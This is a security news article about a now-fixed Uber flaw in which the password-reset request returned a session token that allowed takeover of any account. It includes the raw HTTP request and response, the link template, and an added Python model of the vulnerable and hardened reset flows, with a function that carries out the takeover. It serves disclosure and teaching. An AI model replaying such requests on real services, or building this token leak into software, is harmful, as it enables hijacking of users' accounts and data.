An Italian expert discovered a critical Improper Authentication vulnerability affecting the UBER platform that allowed password reset for any account.

The Italian security expert Vincenzo C., aka @Procode701, discovered seven months ago a critical vulnerability in the Uber platform that allowed a password reset for any Uber account.

The researcher reported the ‘Improper Authentication’ vulnerability through the company’s bug bounty program operated by HackerOne.

“With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.” reads the summary published by Uber.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The Italian expert found a serious flaw in the password reset process: the reset request itself returned a session token, “inAuthSessionID”, that could then be used to change the password of any account.

I contacted the expert for further details, and he told me that simply sending a password reset request with the valid email address of any Uber account produced a reply that included the session token “inAuthSessionID.” The Uber platform generated a new session token every time a user requested a password reset email.

Once the session token “inAuthSessionID” was obtained, it was possible to change the password using the standard link found in the change-password form:

https://auth.uber.com/login/stage/PASTE_SESSION_ID/af9b9d0c-bb98-41de-876c-4cb911c79bd1

PASTE_SESSION_ID: the inAuthSessionID generated when the change-password email is requested
af9b9d0c-bb98-41de-876c-4cb911c79bd1: the tokenID, which has no expiration date

Request:

POST /login/handleanswer HTTP/1.1
Host: auth.uber.com

{
  "init": false,
  "answer": {
    "type": "PASSWORD_RESET_WITH_EMAIL",
    "userIdentifier": { "email": "xxxx@uber.com" }
  }
}

Reply:

HTTP/1.1 200 OK

{
  "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
  "stage": {
    "question": {
      "signinToken": "",
      "type": "VERIFY_PASSWORD_RESET",
      "tripChallenges": []
    },
    "alternatives": []
  }
}
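To make the failure concrete, here is an added example of my own (not Uber’s code and not the researcher’s) that models the reset flow described above as a pair of handlers over an in-memory store. The vulnerable handle_answer_vulnerable echoes the freshly minted inAuthSessionID to whoever sent the reset request, exactly as the captured reply did, and handle_stage_vulnerable accepts that ID alone with no expiry, which is how the page describes the takeover. The hardened pair returns the same generic body whether or not the account exists, delivers the session ID and token only inside the email, compares the token in constant time, and burns it after one use or after a time limit. The account list, the 15-minute TTL, the link layout and the helper names are constructed assumptions.

```python
import hmac
import secrets
import time

# Constructed in-memory stand-ins for the backend (assumptions, not Uber's real service).
ACCOUNTS = {"alice@example.com": {"password": "old-password"}}
SESSIONS = {}        # inAuthSessionID -> {"email", "token_id", "expires", "used"}
EMAIL_OUTBOX = []    # what the mail system would deliver to the account owner

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime of an emailed reset link

# Shape of the captured request from the write-up, with a constructed address.
RESET_REQUEST = {
    "init": False,
    "answer": {
        "type": "PASSWORD_RESET_WITH_EMAIL",
        "userIdentifier": {"email": "alice@example.com"},
    },
}


def _start_reset(email, now):
    """Create a reset session bound to one account and email its link; return the session ID."""
    session_id = secrets.token_urlsafe(24)
    token_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"email": email, "token_id": token_id,
                            "expires": now + TOKEN_TTL_SECONDS, "used": False}
    EMAIL_OUTBOX.append({"to": email, "link": f"/login/stage/{session_id}/{token_id}"})
    return session_id


def handle_answer_vulnerable(body, now=None):
    """The flaw: the fresh inAuthSessionID is echoed to whoever sent the reset request."""
    now = time.time() if now is None else now
    email = body["answer"]["userIdentifier"]["email"]
    if email not in ACCOUNTS:
        return {"error": "unknown account"}          # also an account-enumeration oracle
    session_id = _start_reset(email, now)
    return {"inAuthSessionID": session_id,
            "stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}}


def handle_stage_vulnerable(session_id, new_password):
    """Modelled on the page's description: the session ID alone reaches the password
    change, and nothing expires."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    ACCOUNTS[session["email"]]["password"] = new_password
    return True


def handle_answer_fixed(body, now=None):
    """Hardened: identical generic body whether or not the account exists; the session ID
    and token leave the server only inside the email."""
    now = time.time() if now is None else now
    email = body["answer"]["userIdentifier"]["email"]
    if email in ACCOUNTS:
        _start_reset(email, now)
    return {"stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}}


def handle_stage_fixed(session_id, token_id, new_password, now=None):
    """Consume the emailed link: bound to one account, constant-time token compare,
    time-limited, single use."""
    now = time.time() if now is None else now
    session = SESSIONS.get(session_id)
    if session is None or session["used"] or now > session["expires"]:
        return False
    if not hmac.compare_digest(session["token_id"], token_id):
        return False
    session["used"] = True
    ACCOUNTS[session["email"]]["password"] = new_password
    return True


def parse_stage_link(link):
    """Split '/login/stage/<session>/<token>' back into its parts (what the real user's mail client does)."""
    _, _, _, session_id, token_id = link.split("/")
    return session_id, token_id


def attacker_takeover(email, new_password):
    """The attack as described: request a reset, read the ID from the reply, set a new password."""
    request = {"init": False, "answer": {"type": "PASSWORD_RESET_WITH_EMAIL",
                                          "userIdentifier": {"email": email}}}
    reply = handle_answer_vulnerable(request)
    leaked = reply.get("inAuthSessionID")
    return leaked is not None and handle_stage_vulnerable(leaked, new_password)


if __name__ == "__main__":
    print("vulnerable flow taken over:", attacker_takeover("alice@example.com", "pwned"))
    print("fixed flow leaks session ID:", "inAuthSessionID" in handle_answer_fixed(RESET_REQUEST))
```

The fix is not only “remove the field from the JSON”: the reset secret has to be something the requester never sees, which is why the hardened path returns one indistinguishable body for every email, ties the token to a single account, and refuses replay and stale links.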

The impact of the vulnerability is severe: it allowed an attacker to take over any account and access all of the user’s data (e.g. ID card, driver’s license, banking details), including financial information.

Below is the timeline of the vulnerability:

October 2, 2016 – Bug reported to the company

October 4, 2016 – Flaw Triaged

October 6, 2016 – Flaw Resolved

October 18, 2016 – Researcher rewarded with $10,000 USD.

Pierluigi Paganini

(Security Affairs – Improper Authentication flaw, hacking)
